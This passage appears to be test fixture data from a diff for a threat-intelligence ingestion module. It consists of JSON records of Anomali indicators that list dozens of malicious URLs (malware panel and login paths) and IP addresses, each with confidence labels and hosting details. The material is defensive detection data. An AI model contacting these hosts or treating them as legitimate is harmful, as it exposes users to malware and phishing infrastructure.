Org: Digital Ocean; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-50" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:59.366Z", + "threatintel.anomali.name": "mal_url: http://178.62.187.103/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://178.62.187.103/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:59.366Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "178.62.187.103", + "threatintel.indicator.url.original": "http://178.62.187.103/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 2441, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-66" + ], + "threatintel.anomali.modified": "2020-01-22T02:58:59.457Z", + "threatintel.anomali.name": "mal_url: http://appareluea.com/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://appareluea.com/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:58:59.457Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "appareluea.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://appareluea.com/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 3015, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:06.402Z", + "threatintel.anomali.name": "mal_url: http://nkpotu.xyz/Kpot3/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://nkpotu.xyz/Kpot3/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:06.402Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "nkpotu.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://nkpotu.xyz/Kpot3/login.php", + "threatintel.indicator.url.path": "/Kpot3/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 3598, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-49" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:19.990Z", + "threatintel.anomali.name": "mal_ip: 162.144.128.116", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '162.144.128.116']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:19.990Z", + "threatintel.indicator.ip": "162.144.128.116", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 4149, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-79" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:20.155Z", + "threatintel.anomali.name": "mal_url: http://ntrcgroup.com/nze/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:20.155Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ntrcgroup.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://ntrcgroup.com/nze/panel/admin.php", + "threatintel.indicator.url.path": "/nze/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 4747, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:25.521Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:25.521Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work8/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 5356, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-68" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:25.626Z", + "threatintel.anomali.name": "mal_url: http://f0390764.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0390764.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:25.626Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0390764.xsph.ru", + "threatintel.indicator.url.original": "http://f0390764.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 5971, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-85" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:36.461Z", + "threatintel.anomali.name": "mal_ip: 45.143.138.39", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '45.143.138.39']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:36.461Z", + "threatintel.indicator.ip": "45.143.138.39", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 6501, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-82" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:41.193Z", + "threatintel.anomali.name": "mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:41.193Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "aglfreight.com.my", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/biu/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 7147, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-61" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:41.228Z", + "threatintel.anomali.name": "mal_url: http://95.182.122.184/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://95.182.122.184/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:41.228Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "95.182.122.184", + "threatintel.indicator.url.original": "http://95.182.122.184/", + "threatintel.indicator.url.path": "/", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 7711, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-62" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:51.313Z", + "threatintel.anomali.name": "mal_ip: 198.54.115.121", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '198.54.115.121']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:51.313Z", + "threatintel.indicator.ip": "198.54.115.121", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 8259, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-38" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:51.372Z", + "threatintel.anomali.name": "mal_ip: 192.185.119.172", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '192.185.119.172']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:51.372Z", + "threatintel.indicator.ip": "192.185.119.172", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 8812, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-61" + ], + "threatintel.anomali.modified": "2020-01-22T02:59:51.442Z", + "threatintel.anomali.name": "mal_url: http://f0389246.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0389246.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T02:59:51.442Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0389246.xsph.ru", + "threatintel.indicator.url.original": "http://f0389246.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 9427, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-66" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:01.563Z", + "threatintel.anomali.name": "mal_url: http://appareluea.com/server/cp.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://appareluea.com/server/cp.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:01.563Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "appareluea.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://appareluea.com/server/cp.php", + "threatintel.indicator.url.path": "/server/cp.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 9997, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:03.138Z", + "threatintel.anomali.name": "mal_url: http://nkpotu.xyz/Kpot2/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://nkpotu.xyz/Kpot2/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:03.138Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "nkpotu.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://nkpotu.xyz/Kpot2/login.php", + "threatintel.indicator.url.path": "/Kpot2/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 10580, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:03.396Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:03.396Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work5/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 11189, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:03.642Z", + "threatintel.anomali.name": "mal_url: http://mecharnise.ir/ca4/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://mecharnise.ir/ca4/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:03.642Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "mecharnise.ir", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://mecharnise.ir/ca4/panel/admin.php", + "threatintel.indicator.url.path": "/ca4/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 11769, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:27.534Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:27.534Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work4/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 12378, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-78" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:27.591Z", + "threatintel.anomali.name": "mal_url: http://kironofer.com/webpanel/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://kironofer.com/webpanel/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:27.591Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "kironofer.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://kironofer.com/webpanel/login.php", + "threatintel.indicator.url.path": "/webpanel/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 12985, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-68" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:45.787Z", + "threatintel.anomali.name": "mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:45.787Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "worldatdoor.in", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 13633, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-91" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:45.841Z", + "threatintel.anomali.name": "mal_url: http://smartlinktelecom.top/kings/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://smartlinktelecom.top/kings/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:45.841Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "smartlinktelecom.top", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://smartlinktelecom.top/kings/panel/admin.php", + "threatintel.indicator.url.path": "/kings/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 14255, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332339; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-64" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:45.959Z", + "threatintel.anomali.name": "mal_url: http://carirero.net/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://carirero.net/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:45.959Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "carirero.net", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://carirero.net/login.php", + "threatintel.indicator.url.path": "/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 14830, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332319; iType: mal_ip; State: active; Org: SoftLayer Technologies; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-30" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:46.025Z", + "threatintel.anomali.name": "mal_ip: 74.116.84.20", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '74.116.84.20']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:46.025Z", + "threatintel.indicator.ip": "74.116.84.20", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 15387, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-43" + ], + "threatintel.anomali.modified": "2020-01-22T03:00:57.729Z", + "threatintel.anomali.name": "mal_url: http://tuu.nu/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://tuu.nu/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:00:57.729Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "tuu.nu", + "threatintel.indicator.url.original": "http://tuu.nu/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 15942, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332346; iType: mal_url; State: active; Org: Ifx Networks Colombia; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-36" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:02.696Z", + "threatintel.anomali.name": "mal_url: http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:02.696Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "dulfix.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://dulfix.com/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/cgi-bins/dulfix/gustav57/PvqDq929BSx_A_D_M1n_a.php", + 